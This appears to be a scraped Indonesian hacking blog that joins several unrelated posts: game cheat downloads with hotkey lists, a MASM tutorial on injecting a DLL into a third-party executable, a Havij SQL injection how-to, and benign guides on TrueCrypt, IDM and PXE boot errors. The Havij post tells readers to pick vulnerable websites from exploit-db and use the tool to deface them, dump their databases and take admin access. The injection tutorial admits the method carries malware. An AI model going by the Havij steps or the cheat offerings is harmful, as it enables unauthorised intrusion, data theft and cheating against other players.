[*] COMPLETE CARD = F3
[*] RESET CARD = F2
[*] SPION MODE = F7
[*] NoName Mode = F4
[*] Included With Rinocomp Packet Editor
Credit: Rino_Com@N3


Loki025 21-11-2010 |Download|
[*] MINIMIZE ON = F1
[*] MINIMIZE OF = F2
[*] HACK TITLE = F11
[*] HACK MISI MAYOR = F12
[*] MASMED = NUMPAD 1-0
[*] COMPLETE CARD = INSERT
[*] RESET CARD = DELETE
[*] RESET HACK TITTLE = F10
[*] SPION MODE = HOME
BoTeMz & Dodii-N3 FIX SatNight 10.15.exe |Download|
[*] MisiMayor [F12]
[*] Title Hack [F11]
[*] Card Hack [NUM 0 Sampai 9]
[*] Restart Card [NUM -]
[*] Spion Mode Hack [= F10]
[*] AltTab On [= F1]
[*] AltTab Off [= F2]
DOUBEL MISI MAYOR BY AKIRA CHAN Nstars.net |Download|
FITUR ada di dlam rar..
BlackBerry V.1 |Download|
[*] MINIMIZE : F1 [ON]
[*] MINIMIZE : F2 [OFF]
[*] HACK TITLE : F11
[*] HACK MISI MAYOR = F12
[*] MASMED : NUMPAD 1-0
[*] RESET CARD : DELETE
[*] RESET TITTLE : F10
X-LonZ_Repack 20112010 |Donwload|

Paasword→X-LONZ
[*] MINIMIZE = F1 [ON]
[*] MINIMIZE = F2 [OFF]
[*] Spion Mode = F10
[*] HACK TITLE = F11
[*] HACK MISI MAYOR = F12
[*] MASMED = NUMPAD 1-0
[*] RESET CARD = DELETE

[PB] zenix 20/11/2010
|Download|
[*] MINIMIZE            = F9  [ON]
[*] MINIMIZE = F10 [OFF]
[*] UNLIMITED DUAL = F11 [ON]
[*] UNLIMITED DUAL = F12 [OFF]
[*] NO RECOIL = F7 [ON]
[*] NO RECOIL = F8 [OFF]
[*] HACK TITLE = INSERT
[*] HACK MISSION = F1
[*] MASMED = NUMPAD 0-9
[*] MISSION CLEAR = HOME
[*] RESET CARD = END
[*] FREE VIEW MODE = DELETE
[*] AUTO CHANGE NAME

Source:
http://bayikuntilanak.blogspot.com/
»»  READMORE...

Tutorial Injeksi Executable – Splash Screen

Pernahkah Anda melihat Splash Screen bergambar pada sebuah software, entah itu software
trial utilities, Game dan lainnya? Artikel ini akan menunjukkan kepada Anda bagaimana cara
menyisipkan sebuah Splash Screen bergambar dengan menggunakan bitmap yang akan muncul secara
otomatis setiap kali software dijalankan. Artikel ini sedikit banyak hampir sama dengan artikel
sebelumnya “Tutorial Injeksi Executable – MessageBox”. Pembahasan masih dalam lingkup
Portable Executable (PE). Yang membedakan pada artikel kali ini adalah teknik pada penerapan injeksi.
Sebelum membaca artikel ini Saya harap Anda mempunyai latar belakang atau dasar
pemrograman bahasa C/C++/ASM, Portable Executable dan Reverse Engineering. Hal tersebut akan
membantu dan mempermudah Anda untuk memahami artikel ini. Maaf, Saya sudah berusaha
menyederhanakan pembahasan pada artikel ini agar bisa dipahami oleh semua orang, namun jika masih
sulit dipahami Saya mohon maaf. Karena dasar ilmu Saya adalah dunia peternakan bukan komputer, jadi
Saya tidak bisa menjelaskan dengan gaya bicara programmer pada umumnya.. :)
Beberapa hal yang perlu Anda persiapkan adalah :
  1. IID King v1.0 buatan SantMat dari tim Reverse Engineering Immortal Descendants.
  2. Notepad atau teks editor yang Anda sukai.
  3. Assembler (Saya menggunakan Microsoft Macro Assembler atau MASM link download silahkan cari di Google).
  4. Target file executable.
  5. Palmall cigarettes, a cup of coffe and Cradle of Filth-Beyond Eleventh Hour.mp3 (Anti ngantuk :) )
  6. MRHPx Splash Add, program ini mampu menyisipkan Splash Screen bitmap secara instant. Anda
bisa mempergunakan program ini jika Anda bosan membaca artikel Saya.
CATATAN : File target, source code dan tool telah disertakan bersama artikel ini. Jika tidak tersedia Anda
bisa mendownloadnya di website Saya. Untuk mendapatkan source code yang lain, silahkan melalui
kontak email Saya.

Teori Yang Membosankan
Sedikit berbicara tentang teori. Menyisipkan sebuah kode Splash Screen seperti Dialog Window
(Jendela) dan resource eksternal pada file executable bukanlah hal yang mudah, semuanya tergantung
pada keahlian Reverse Engineering yang Anda miliki, karena jika terjadi kesalahan akan membuat file
executable menjadi rusak. Terlebih lagi persoalan menjadi semakin rumit jika Anda menghadapi file
executable yang tidak memiliki resource ataupun IMPORT API LIBRARY yang diperlukan. Karena tidak
seorangpun di dunia ini yang rela menghabiskan waktunya di depan komputer melakukan puluhan
proses injeksi hanya untuk membuat jendela dialog membosankan yang bernama “Splash Screen” pada
sebuah file executable..:)
Untuk menyisipkan sebuah file bergambar atau bitmap image sebenarnya sangat mungkin untuk
diterapkan pada file Portable Executable (PE). Cara yang bisa dipergunakan salah satunya adalah dengan
membuat file DLL (Dinamic Link Library) sebagai resource dari Splash Screen bitmap. Setelah proses
injeksi, program akan menjalankan fungsi EXPORT LIBRARY yang terdapat pada file DLL. Meskipun hal
tersebut mungkin sedikit menghabiskan waktu daripada menyisipkan sebuah kode sederhana.

Step 1 : Membuat file Dynamic Link Library (DLL) dengan Assembly
a) The DLL
Fungsi DllEntryPoint adalah suatu metode masukan opsional ke dalam sebuah dynamic-link
library (DLL). Jika fungsi dipergunakan, maka akan dipanggil oleh sistem saat proses dan thread
diinisialisasi dan diakhiri, atau saat dipanggil ke fungsi LoadLibrary dan FreeLibrary.
DllEntry Proc hInst:DWord, reason:DWord, reserved1:DWord
.If reason==DLL_PROCESS_ATTACH
Push hInst
Pop hInstance
Call ShowBitMap
.EndIf
Mov Eax,TRUE
Ret
DllEntry EndP
b) The Bitmap
Proses ini dipergunakan untuk menampilkan Bitmap image Splash Screen yang berada pada
resource. Pada proses ini terdapat beberapa struktur yang dipergunakan antara lain :
- WNDCLASSEX
Import Library : -
Header File : winuser.h
Struktur WNDCLASSEX berisi informasi kelas window. Dipergunakan bersama fungsi
RegisterClassEx dan GetClassInfoEx. Struktur WNDCLASSEX mirip dengan struktur WNDCLASS.
Terdapat 2 perbedaan. WNDCLASSEX meliputi anggota cbSize, yang menetapkan struktur
ukuran, dan anggota hIconSm, yang berisi handle terhadap sebuah ikon kecil yang berhubungan
dengan kelas jendela.
- MSG
Import Library : -
Header File : winuser.h
Struktur MSG berisi informasi pesan dari suatu thread urutan pesan.
- CreateWindowEx
Import Library : user32.lib
Header File : winuser.h
Fungsi CreateWindowEx menciptakan suatu overlap, pop-up, atau anak jendela dengan suatu
perluasan gaya. Fungsi ini identik dengan fungsi CreateWindow.
ShowBitMap Proc
Local wc:WNDCLASSEX
Local msg:MSG
Local hwnd:HWND
Mov wc.cbSize, SizeOf WNDCLASSEX
Mov wc.style, CS_HREDRAW Or CS_VREDRAW
Mov wc.lpfnWndProc, Offset WndProc
Mov wc.cbClsExtra, NULL
Mov wc.cbWndExtra, NULL
Push hInstance
Pop wc.hInstance
Mov wc.hbrBackground, COLOR_WINDOW+1
Mov wc.lpszMenuName, NULL
Mov wc.lpszClassName, Offset NamaKelas
Invoke LoadIcon, NULL, IDI_APPLICATION
Mov wc.hIcon, Eax
Mov wc.hIconSm, 0
Invoke LoadCursor, NULL, IDC_ARROW
Mov wc.hCursor, Eax
Invoke RegisterClassEx, Addr wc
Invoke CreateWindowEx, NULL, Addr NamaKelas, NULL,\
WS_POPUP, CW_USEDEFAULT,\
CW_USEDEFAULT, 257, 309, NULL, NULL,\
hInstance, NULL
Mov hwnd, Eax
Invoke ShowWindow, hwnd, SW_SHOWNORMAL
.While TRUE
Invoke GetMessage, Addr msg, NULL, 0, 0
.Break .If (!Eax)
Invoke TranslateMessage, Addr msg
Invoke DispatchMessage, Addr msg
.EndW
Mov Eax, msg.wParam
Ret
ShowBitMap EndP
c) The Window
Proses ini dipergunakan untuk menampilkan jendela dialog. Pada proses ini terdapat beberapa
struktur yang dipergunakan antara lain :
- PAINTSTRUCT
Import Library : -
Header File : winuser.h
Struktur PAINTSTRUCT berisi informasi untuk sebuah aplikasi. Informasi ini bisa dipergunakan
untuk mengecat area klien pada suatu jendela yang dimiliki oleh aplikasi.
- RECT
Import Library : -
Header File : windef.h
Struktur RECT menggambarkan kordinat sudut kiri atas dan kanan bawah sebuah segi empat.
- Timer
Import Library : user-defined
Header File : winuser.h
Fungsi TimerProc adalah suatu fungsi gambaran-aplikasi callback yang memproses pesan
WM_TIMER.
WndProc Proc hWnd:DWord,uMsg:DWord,wParam:DWord,lParam:DWord
Local ps:PAINTSTRUCT
Local hdc:HDC
Local hMemoryDC:HDC
Local hOldBmp:DWord
Local bitmap:BITMAP
Local DlgHeight:DWord
Local DlgWidth:DWord
Local DlgRect:RECT
Local DesktopRect:RECT
.If uMsg==WM_DESTROY
.If PenangananBitmap!=0
Invoke DeleteObject, PenangananBitmap
.EndIf
Invoke PostQuitMessage, NULL
.ElseIf uMsg==WM_CREATE
Invoke GetWindowRect, hWnd, Addr DlgRect
Invoke GetDesktopWindow
Mov Ecx, Eax
Invoke GetWindowRect, Ecx, Addr DesktopRect
Push 0
Mov Eax, DlgRect.bottom
Sub Eax, DlgRect.top
Mov DlgHeight, Eax
Push Eax
Mov Eax, DlgRect.right
Sub Eax, DlgRect.left
Mov DlgWidth, Eax
Push Eax
Mov Eax, DesktopRect.bottom
Sub Eax, DlgHeight
Shr Eax, 1
Push Eax
Mov Eax, DesktopRect.right
Sub Eax, DlgWidth
Shr Eax, 1
Push Eax
Push hWnd
Call MoveWindow
Invoke LoadBitmap, hInstance, Addr NamaBitmap
Mov PenangananBitmap, Eax
Invoke SetTimer, hWnd, 1, 5000, NULL
Mov Timernya,Eax
.ElseIf uMsg==WM_TIMER
Invoke SendMessage, hWnd, WM_LBUTTONDOWN, NULL, NULL
Invoke KillTimer, hWnd, Timernya
.ElseIf uMsg==WM_PAINT
Invoke BeginPaint, hWnd, Addr ps
Mov hdc, Eax
Invoke CreateCompatibleDC, hdc
Mov hMemoryDC, Eax
Invoke SelectObject, Eax, PenangananBitmap
Mov hOldBmp, Eax
Invoke GetObject, PenangananBitmap, SizeOf BITMAP, Addr bitmap
Invoke StretchBlt, hdc, 0, 0, 257, 309,\
hMemoryDC, 0, 0, bitmap.bmWidth, bitmap.bmHeight, SRCCOPY
Invoke SelectObject, hMemoryDC, hOldBmp
Invoke DeleteDC, hMemoryDC
Invoke EndPaint, hWnd, Addr ps
.ElseIf uMsg==WM_LBUTTONDOWN
Invoke DestroyWindow, hWnd
.Else
Invoke DefWindowProc, hWnd, uMsg, wParam, lParam
Ret
.EndIf
Xor Eax, Eax
Ret
WndProc EndP
d) The Export
Agar file DLL bisa berjalan normal, Anda harus membuat file *.DEF, misal : Splash.Def. Agar fungsi export
bisa berada dalam export tabel DLL. Kode “Splash.asm” sebenarnya tidak secara spesifik menggunakan
export seperti program “DLL NORMAL” pada umumnya, jadi sebagai contoh Saya sengaja memasukkan
2 buah proses yang ada. Bagi Saya yang penting program bisa berjalan sesuai harapan, untuk hal lain
seperti teori silahkan mempelajarinya di bangku kuliah, karena Saya tidak menyukai kuliah bidang
komputer! Biayanya terlalu mahal.. :(
LIBRARY SPLASH.DLL
EXPORTS ShowBitMap
EXPORTS WndProc
CATATAN : Jangan menyalin kode pada halaman ini untuk menghindari kesalahan coding. Silahkan
pergunakan kode yang telah disertakan. Saya sarankan Anda membaca terlebih dahulu penjelasan yang
terdapat dalam Source Code.

Step 2 : CRACKadabra®.. Jadilah program ajaib!
Untuk melakukan proses compile, silahkan Anda klik ganda file dengan nama “Compile.bat”.
Jangan lupa sebelum melakukan proses compile, sesuaikan terlebih dahulu konfigurasi compiler MASM
yang terdapat pada komputer Anda.
Contoh :
set letak=C:\masm32\bin
set include=C:\masm32\include
set lib=C:\masm32\lib

Screenshot Compile.bat

Step 3 : Proses injeksi file executable.

Screenshot Target.exe
  • Jalankan tool “IID King” load file “Target.exe”.. Jangan lupa berilah tanda cek pada menu Backup agar jika terjadi kesalahan pada saat injeksi, Anda bisa mengembalikan semua lagi.
  • Pada kolom “Dll’s Name” masukkan nama file DLL yang akan Anda pergunakan, misal “Splash.dll”
  • Pada kolom “Function’s Name (case sensitive)” Masukkan salah satu fungsi export yang diperlukan, Anda bisa mendapatkan fungsi export ini pada file “Splash.def”. Misal masukkan fungsi export “ShowBitmap” (tanpa tanda kutip). Untuk menambahkan fungsi export cukup klik tombol “+”, untuk menghapus fungsi export yang tidak Anda inginkan cukup klik tombol “-“.
  • Setelah itu klik tombol “Add them!!” untuk melakukan injeksi pada target executable. Jika semua berjalan lancar, maka file target yang telah Anda injeksi akan menampilkan Splash Screen setiap kali executable dijalankan.

Screenshot IID King

Final notes :
File “Target.exe” yang dijalankan, secara otomatis akan me-load semua link statis DLL pada Import
Table, misal “Splash.dll” dan kemudian mengirim DLL_PROCESS_ATTACH kepada program target.
Perhatikan section baru dengan nama “.IIDKing” setelah terjadi proses injeksi. Dari sini bisa diketahui
tentang cara kerja file DLL tersebut beserta injeksinya. Mudah bukan? Saya harap Anda tidak menemui
kesulitan dalam mempelajari injeksi executable dari artikel “Tutorial Injeksi Executable –
MessageBox” sampai dengan artikel “Tutorial Injeksi Executable – Splash Screen”. Bagi Anda
yang tidak sempat membaca artikel ini atau mungkin bosan membaca artikel ini, dan ingin
menggunakan cara instant langsung jadi seperti memasak mie instant, Anda bisa menggunakan software
MRHPx Splash Add..

Screenshot MRHPx Splash Add
Teknik ini juga bisa dipergunakan untuk melakukan injeksi yang lain, tidak hanya Splash Screen.
Bayangkan saja jika ada orang yang melakukan injeksi program worm, exploit dan malware lainnya yang
merugikan ke dalam executable? Bukan MessageBox ataupun Splash Screen? Tentunya hal tersebut
akan sangat merugikan. Solusi dari Saya adalah lakukan “Section Dump” atau “Extract Overlay”
kemudian lakukan analisa Reverse Engineering (Bukan begitu saudara Apakekdah? ). Hal tersebut
setidaknya akan membantu Anda memperoleh informasi yang cukup tentang malware yang disisipkan di
dalam executable. Sebagai catatan, Antivirus tidak selalu bisa diandalkan untuk hal seperti ini. Semoga
artikel ini bisa memberi manfaat bagi Anda dan membantu Anda menjaga diri Anda dari kejahatan
cyber. Terima kasih.
Download Executable Injection Tutorial – Part 2 : Splash Screen Part 1

Download Executable Injection Tutorial – Part 2 : Splash Screen Part 2
MRHPx regards and messages :
  • My family for love, peace and emphaty.. Allah SWT and Muhammad SAW for life, light and everything..
  • Reverse Code Engineering scene, Astalavista.MS, Blackhat Community, 0day,Indonesia veteran hAxx0r (You know who you are.. :) )
  • Source code semua program atau hack tool (EXCEPT PRIVATE-SECRET TOOLS!) dari seluruh artikel dan rilis NeMeSiS_ByTe dan MRHPx bisa diperoleh dengan cara kontak melalui email baru Saya di atas.. Ehm, sori ganti Nickname sejak 2008 tidak lagi sebagai NeMeSiS_ByTe :) Juga ganti email, ganti website, ganti peruntungan! :) Long live reverser..!
PENTING :
  • Jika Anda request software atau tool yang tidak terdapat di website Saya atau sulit didapatkan (baik software gratis atau berbayar), harap mengganti biaya bandwith internet (Download Broadband) dan biaya pengiriman (CD Distribusi Pos). Harap maklum, Saya bukan milyuner yang mempunyai banyak uang, Saya tidak mungkin membiayai setiap request software dan tool yang Anda butuhkan.
  • Untuk keperluan apapun harap menghubungi Saya melalui email Yahoo atau Facebook, karena nomer telpon Saya hanya untuk keperluan bisnis dan pekerjaan. Bukan dipergunakan untuk CHAT dan tanya jawab.
»»  READMORE...

SQL Injection Menggunakan HAVIJ

Today's world it is very watered down, just so users can instantly good at SQL Injection, without having to know the basics. You can call your self what?
Okay, this just sharing how SQL Injection Havij:
1.A. Please search for targets using SQL Injection Vulnerability, can be obtained from the search and exploit-db.com, please be found here: http://www.exploit-db.com/webapps, find a vulnerability that has a keyword "SQL injection".
2. Then please download HAVIJ TOOLS DOWNLOAD FREE or PRO HAVIJ (Thanks To AcizNinja For Update):
Download Havij Pro
3. Mandatory to download & help support the following: PDF & CHM HELP HELP
4. Here are some images HAVIJ TOOLS:
Havij
Havij
Havij
Havij
Havij
5. The main steps in Havij:

     Find a website that has a SQL Injection Vulnerable
     Enter a vulnerable target to the tab "Target" in Havij unmarked '
     Then click Analyze
     The menus are there please HELP studied in PDF & CHM HELP who have downloaded for each function.

What the hell that can be obtained by using these tools?
         1.You can deface the website HAVIJ
         2.You can copy / save database with HAVIJ
         3.You can find the admin login with HAVIJ
         4.You can be the administrator of the website with HAVIJ
         5.Furthermore depending on the extent to which your shrewdness in managing the target: D
      »»  READMORE...

      Enkripsi USB Drive Menggunakan Truecrypt

      Kali ini kami akan berbagi video bagaimana caranya agar kita bisa melakukan enkripsi USB yang kita miliki menggunakan Truecrypt.
      Truecrypt
      Hal ini bertujuan untuk apa?
      Untuk mengamankan USB kita dari pencuri sehingga data sensitif kita menjadi lebih aman dan nyaman.
      Disamping itu juga agar data private anda akan jauh lebih terjaga + kalau USB hilang kita tidak khawatir dengan isi data yang ada di dalam USB :)
      Sambil lalu silakan download toolnya disini:
      Download True Crypt
      Untuk petunjuk langkah-langkah dan detailnya bisa langsung di lihat di video berikut.
      Oke, langsung saja kita tonton videonya:
      Semoga artikel di atas bermanfaat & tingkatkan kemampuan anda :)
      »»  READMORE...

      Download Youtube – Internet Download Manager

      Berikut ini adalah cara mudah download menggunakan Internet Download Manager dari Youtube. Semua pengguna internet pasti sudah tidak asing lagi dengan website penyedia layanan video sharing youtube. Di situs ini, kita bisa dengan mudah mengunggah (upload), melihat dan berbagi video klip, trailer, cerita dan Video Hacking kita, Semua Video Tutorial  Hacking Yang Ada Di BinusHacker Website Bisa Di Download Dengan Menggunakan IDM, Silakan Bagi Yang Ingin Menonton Secara Offline Tutorial Video Hacking Di Komputer Anda Downloadlah Dengan Tools Ini.
      youtube logo Cara Download Video dari Youtube Menggunakan IDMYoutube didirikan oleh 3 orang mantan pegawai PayPal pada bulan Februari 2005. Karena perkembangannya yang begitu cepat, pada bulan November 2006, dibeli oleh Google Inc., dan sekarang beroperasi sebagai bagian dari Google. Berbagai macam konten video bisa ditemukan disini, diantaranya adalah video clip film, video clip musik dan juga video clip amatir seperti video blogging dan video clip original dengan durasi pendek.
      Sebenarnya, layanan ini adalah layanan video streaming yang hanya bisa dilihat langsung dari websitenya tanpa menyediakan link downloadnya. Akan tetapi karena keterbatasan kecepatan akses internet yang menyebabkan streaming video dari youtube itu tidak lancar dan bisa dinikmati dengan sempurna, orang cenderung untuk mendownload video tersebut.
      Pada artikel kali ini, kita akan membicarakan langkah-langkah download video menggunakan download management software handal dan ternama Internet Download Manager.
      Cara download youtube dengan idm, cara menggunakan IDM, cara download video youtube dengan IDM, cara download lewat idm, download youtube dengan idm, cara download video dari youtube dengan idm, cara menggunakan Internet Download Manager, cara download video di youtube dengan idm, download youtube idm, idm youtube, cara mendownload video dari youtube dengan idm, download video youtube dengan idm, cara download youtube dengan internet download manager, cara download youtube IDM, cara download menggunakan idm, cara mengaktifkan idm, cara download youtube pake idm, cara download video dengan idm, cara memakai idm, cara download youtube lewat idm.
      Langkah-langkahnya adalah sebagai berikut:
      1. Siapkan software IDM. Jika kita belum mempunyai perangkat lunak tersebut, kita bisa mendownload versi terbarunya di website resminya di www.internetdownloadmanager.com.
      2. Bukalah situs youtube di www.youtube.com.
      3. Carilah video klip favorit anda dengan mengetikkan kata kunci yang anda maksud, lalu tekan tombol search. Misalnya, kita masukkan kata kunci: ST12, maka akan ditampilkan semua video klip yang berhubungan dengan kata kunci tsb. Lalu kita pilih salah satunya.
      4. Apabila Internet Download Manager sudah terinstal dengan baik pada komputer kita, beberapa saat setelah kita membuka halaman tersebut, maka akan muncul tombol Download this video pada bagian kanan atas frame video tersebut. Tampilannya kira-kira seperti ini:
      langkah download youtube 1 300x225 Cara Download Video dari Youtube Menggunakan IDM
      5. Kliklah tombol tersebut, sehingga akan muncul kotak konfirmasi untuk menyimpan file yang akan kita unduh tersebut.
      langkah download youtube 2 300x103 Cara Download Video dari Youtube Menggunakan IDM
      6. Klik tombol Start download dan tunggu hingga prosesnya selesai.
      langkah download youtube 3 300x217 Cara Download Video dari Youtube Menggunakan IDM
      7. Setelah proses itu selesai, kita bisa memutar video tersebut dengan lancar di komputer kita.
      Untuk feature yang tersedia anda bisa membaca juga artikel lengkap IDM disini: http://www.internetdownloadmanager.com/support/using_idm/using_idm.html – Courtesy of Babeh.Net
      »»  READMORE...

      Cara Mengatasi PXE-E61 Media Test Failure,

      Check Cable adalah topik kali ini. PXE (Preboot eXecution Environment) adalah boot area yang dibuat oleh Intel. PXE memungkinkan workstation untuk boot dengan menggunakan interface jaringan sebelum boot dari sistem operasi perangkat penyimpanan lokal seperti hard disk. Jika pesan ini muncul maka jelas bahwa ada masalah pada hard drive laptop anda.
       Ketika kegagalan boot hard disk terjadi, komputer tidak akan boot ada 3 pesan yang sering muncul:
      1. PXE-E61 Media Test Failure, Check Cable
      2. PXE-M0F: Exiting Intel PXE-ROM
      3. Boot Failure: System Halted.
       Ketiga pesan ini merujuk pada kesalahan yang sama dan akan terus berulang setiap kali kita mencoba menjalankan laptop, dan akan membatasi akses data ke hard disk.
      Apa penyebabnya?
      Hard disk boot failure pada kasus PXE bisa terjadi karena beberapa alasan. Alasan yang paling umum adalah kerusakan fisik hard disk karena hard disk rusak atau kabel datanya/ socketnya tidak terhubung dengan benar. Kesalahan ini juga bisa terjadi jika komputer mencoba boot dari perangkat dan tidak dapat menemukan file boot yang diperlukan.
      Kesalahan juga bisa muncul karena BIOS (Basic Input / Output System) yang salah atau kesalahan pengaturan pada CMOS (Complementary Metal Oxide Semiconductor). BIOS berisi instruksi bagaimana seharusnya proses boot komputer. BIOS hanya dapat diperbarui atau dimodifikasi dengan update BIOS. CMOS berisi pengaturan sistem anda dan didukung oleh baterai CMOS. CMOS dapat diubah atau dimodifikasi dengan melakukan CMOS setup.
       pxe-e61-media-test-failure
      Setup untuk BIOS dan CMOS adalah sama, tetapi BIOS dan CMOS pada motherboard tidak sama. Berikut adalah langkah-langkah untuk mengakses BIOS dan CMOS untuk membantu Anda menyelesaikan kesalahan.
      Diagnosa penyebab dan penelesaian PXE-E61 Media Test Failure, Check Cable
      Sangat penting untuk mengisolasi penyebab dari PXE-E61 Media Test Failure, Check Cable dan kemudian memecahkannya. Untuk melakukannya, ikuti langkah-langkah berikut:
      1. Buka dan pasang kembali hard disk dengan baik, agar koneksi yang logger dapat diatasi. Ini biasanya terjadi pada penggantian hard disk atau laptop terguncang sangat kuat. Jika ini terjadi pada PC, pastikan kabel data terpasang rapat pada hard drive.
      2. Pastikan bahwa tidak ada perangkat penyimpanan lain terhubung ke komputer Anda. Jika ada perangkat penyimpanan yang terhubung, lepaskan dulu lalu tes lagi.
      3. Ketika Anda menghidupkan komputer/laptop, silahkan masuk ke BIOS untuk melihat apakah hard disk telah diatur dengan benar dan terdeteksi di BIOS. Untuk memasuki BIOS, ikuti langkah berikut:
        1. Tombol keyboard  yang harus Anda tekan untuk masuk ke BIOS bervariasi tergantung pada model komputer Anda. Pada kebanyakan computer/laptop yang paling umum adalah tombol Del atau salah satu tombol F1, F2, F10.
        2. Setelah masuk BIOS, coba setting BIOS anda ke pengaturan default agar aman. Itu mungkin bias memperbaiki kesalahan yang muncul.
        3. Jika setup CMOS menunjukkan pilihan boot dari LAN atau sumber lain, nonaktifkan opsi ini.
      4. Ada kemungkinan bahwa kesalahan disebabkan karena kegagalan fisik jika hard disk tidak dapat terdeteksi. Jika hal ini terjadi, Anda akan harus mengganti hard disk.
      Catatan : Sejauh pengalaman saya (mungkin pengalaman anda lain), masalah ini lebih sering disebabkan oleh kerusakan fisik hardware yang menebabkan PXE-E61 Media Test Failure, Check Cable.
      »»  READMORE...